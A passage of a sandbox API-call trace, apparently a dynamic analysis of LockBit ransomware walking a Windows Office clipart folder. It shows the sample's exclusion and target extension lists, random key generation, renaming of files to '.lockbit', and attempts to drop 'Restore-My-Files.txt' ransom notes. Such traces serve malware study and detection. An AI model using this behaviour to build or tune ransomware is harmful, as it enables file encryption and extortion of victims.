NtSetInformationFile (FileHandle=0xcac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0101.871] free (_Block=0x77d800) [0101.871] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0101.871] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0101.871] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0101.871] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a04e500, ftCreationTime.dwHighDateTime=0x1bd4e61, ftLastAccessTime.dwLowDateTime=0x5eb686b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2a04e500, ftLastWriteTime.dwHighDateTime=0x1bd4e61, nFileSizeHigh=0x0, nFileSizeLow=0x1126, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00172_.GIF", cAlternateFileName="")) returned 1 [0101.871] lstrcmpiW (lpString1=".", lpString2="AG00172_.GIF") returned -1 [0101.871] lstrcmpiW (lpString1="..", lpString2="AG00172_.GIF") returned -1 [0101.871] PathFindExtensionW (pszPath="AG00172_.GIF") returned=".GIF" [0101.871] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0101.871] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0101.871] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0101.871] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0101.871] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0101.871] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0101.871] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0101.871] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0101.871] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0101.871] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0101.872] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0101.872] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0101.872] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0101.872] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0101.872] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0101.872] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0101.872] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0101.872] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0101.872] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0101.872] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0101.872] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0101.872] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0101.872] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0101.872] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0101.872] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.875] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0101.875] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0101.875] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0101.875] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0101.875] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0101.875] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0101.875] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0101.875] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0101.875] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0101.875] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0101.875] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0101.875] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0101.875] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0101.875] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0101.875] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0101.875] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0101.875] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0101.875] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.875] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0101.875] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0101.875] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0101.875] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0101.875] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00172_.GIF") returned 1 [0101.875] lstrcmpiW (lpString1="ntldr", lpString2="AG00172_.GIF") returned 1 [0101.875] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00172_.GIF") returned 1 [0101.875] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00172_.GIF") returned 1 [0101.876] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00172_.GIF") returned 1 [0101.876] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00172_.GIF") returned 1 [0101.876] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00172_.GIF") returned 1 [0101.876] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0101.876] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned=".GIF" [0101.876] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0101.876] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0101.876] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0101.876] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0101.876] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0101.876] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0101.876] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0101.876] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0101.876] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0101.876] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0101.876] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0101.876] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0101.876] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0101.876] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0101.876] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0101.876] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0101.876] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0101.876] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0101.876] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0101.876] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0101.876] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0101.876] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0101.876] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0101.876] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0101.876] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0101.876] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0101.877] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0101.877] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0101.877] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF.lockbit") returned 72 [0101.877] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00172_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xef8 [0101.885] CreateIoCompletionPort (FileHandle=0xef8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0101.885] malloc (_Size=0x40068) returned 0x1ff1e60 [0101.887] GetFileSizeEx (in: hFile=0xef8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4390) returned 1 [0101.887] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.888] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0101.888] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.889] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0101.890] ReadFile (in: hFile=0xef8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0101.892] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0101.892] malloc (_Size=0xa6) returned 0x77d800 [0101.892] NtSetInformationFile (FileHandle=0xef8, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0101.893] free (_Block=0x77d800) [0101.893] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0101.893] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0101.893] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0101.893] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde4d3e00, ftCreationTime.dwHighDateTime=0x1bd4e56, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xde4d3e00, ftLastWriteTime.dwHighDateTime=0x1bd4e56, nFileSizeHigh=0x0, nFileSizeLow=0xf7e, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00174_.GIF", cAlternateFileName="")) returned 1 [0101.893] lstrcmpiW (lpString1=".", lpString2="AG00174_.GIF") returned -1 [0101.893] lstrcmpiW (lpString1="..", lpString2="AG00174_.GIF") returned -1 [0101.893] PathFindExtensionW (pszPath="AG00174_.GIF") returned=".GIF" [0101.893] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0101.893] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0101.893] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0101.893] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0101.893] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0101.893] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0101.894] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0101.894] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0101.894] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0101.894] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0101.894] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0101.894] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0101.894] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0101.894] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0101.894] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0101.894] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0101.894] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0101.894] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0101.894] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0101.894] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0101.894] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0101.894] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0101.894] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0101.894] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0101.894] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.894] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0101.894] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0101.894] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0101.894] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0101.894] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0101.894] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0101.895] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0101.895] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0101.895] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0101.895] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0101.895] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0101.895] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0101.895] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0101.895] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0101.895] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0101.895] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0101.895] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0101.895] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.895] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0101.895] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0101.895] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0101.895] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0101.895] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00174_.GIF") returned 1 [0101.895] lstrcmpiW (lpString1="ntldr", lpString2="AG00174_.GIF") returned 1 [0101.895] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00174_.GIF") returned 1 [0101.895] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00174_.GIF") returned 1 [0101.895] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00174_.GIF") returned 1 [0101.895] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00174_.GIF") returned 1 [0101.895] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00174_.GIF") returned 1 [0101.895] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0101.896] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned=".GIF" [0101.896] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0101.896] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0101.896] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0101.896] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0101.896] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0101.896] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0101.896] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0101.896] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0101.896] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0101.896] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0101.896] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0101.896] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0101.896] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0101.896] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0101.896] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0101.896] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0101.896] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0101.896] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0101.896] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0101.896] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0101.896] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0101.896] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0101.896] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0101.896] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0101.897] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0101.897] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0101.897] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0101.897] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0101.897] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF.lockbit") returned 72 [0101.897] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xefc [0101.897] CreateIoCompletionPort (FileHandle=0xefc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0101.897] malloc (_Size=0x40068) returned 0x3ef0008 [0101.898] GetFileSizeEx (in: hFile=0xefc, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=3966) returned 1 [0101.898] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.900] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.900] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0101.900] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.901] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0101.901] ReadFile (in: hFile=0xefc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0101.910] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0101.910] malloc (_Size=0xa6) returned 0x77d800 [0101.910] NtSetInformationFile (FileHandle=0xefc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0101.911] free (_Block=0x77d800) [0101.911] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0101.911] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0101.911] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0101.911] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc18a400, ftCreationTime.dwHighDateTime=0x1bd4e52, ftLastAccessTime.dwLowDateTime=0x5eb686b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc18a400, ftLastWriteTime.dwHighDateTime=0x1bd4e52, nFileSizeHigh=0x0, nFileSizeLow=0xd32, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00175_.GIF", cAlternateFileName="")) returned 1 [0101.911] lstrcmpiW (lpString1=".", lpString2="AG00175_.GIF") returned -1 [0101.911] lstrcmpiW (lpString1="..", lpString2="AG00175_.GIF") returned -1 [0101.911] PathFindExtensionW (pszPath="AG00175_.GIF") returned=".GIF" [0101.911] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0101.911] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0101.911] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0101.911] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0101.911] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0101.911] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0101.911] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0101.911] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0101.911] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0101.912] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0101.912] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0101.912] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0101.912] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0101.912] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0101.912] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0101.912] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0101.912] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0101.912] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0101.912] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0101.912] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0101.912] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0101.912] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0101.912] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0101.912] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0101.912] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.912] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0101.912] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0101.912] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0101.912] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0101.913] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0101.913] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0101.913] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0101.913] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0101.913] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0101.913] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0101.913] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0101.913] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0101.913] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0101.913] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0101.913] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0101.913] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0101.913] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0101.913] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.913] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0101.913] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0101.913] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0101.913] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0101.913] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00175_.GIF") returned 1 [0101.913] lstrcmpiW (lpString1="ntldr", lpString2="AG00175_.GIF") returned 1 [0101.913] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00175_.GIF") returned 1 [0101.913] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00175_.GIF") returned 1 [0101.913] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00175_.GIF") returned 1 [0101.914] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00175_.GIF") returned 1 [0101.914] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00175_.GIF") returned 1 [0101.914] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0101.914] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned=".GIF" [0101.914] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0101.914] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0101.914] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0101.914] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0101.914] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 